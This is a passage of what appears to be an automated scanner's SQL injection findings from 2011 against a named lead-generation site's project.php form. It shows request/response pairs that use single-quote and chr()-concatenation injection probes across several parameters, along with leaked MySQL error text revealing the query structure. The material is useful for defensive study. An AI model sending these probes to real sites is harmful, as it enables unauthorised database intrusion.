select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3''&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2hvps2ijj1r18b4nu1j7c93nd2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_490 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_490 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)'&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=t0rl9326j1phhhp1vij7629s61; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Unsure - please advise&attributeId_517=3361__ No - we are not committed or do no' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)''&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pjfun2392r6bv1102saoibphh7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_516 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_516 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise'&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:20:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=nrfitr0ea5kk7gqc0n33tqhni2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'No - we are not committed or do not have lines currently&button3=Submit&companyn' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise''&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:20:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2uusfdq3lldbjn4qqedarpjop7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_517 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_517 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:21:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=837cvqhgp4a5nkc2uv32258uq7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:21:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=penuqmbeppcv06o7amo62kq0u0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=keg1mmomu6m6kes91sflt6esq7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=oede17e4elf74n1u8uiksb0et2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006'&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7mdj4fjpacmglpg4q556m1um04; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)&attributeId_342_g=2017__Accounting/Finance&attributeId_343_g=2009__1-9&' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006''&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:15:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=cdj4kn1ehkjebt5hjjrfunvre3; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project.php was not found on this server.</p>
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2djh9ho8g06odqk9mq84266oj7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip cod' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
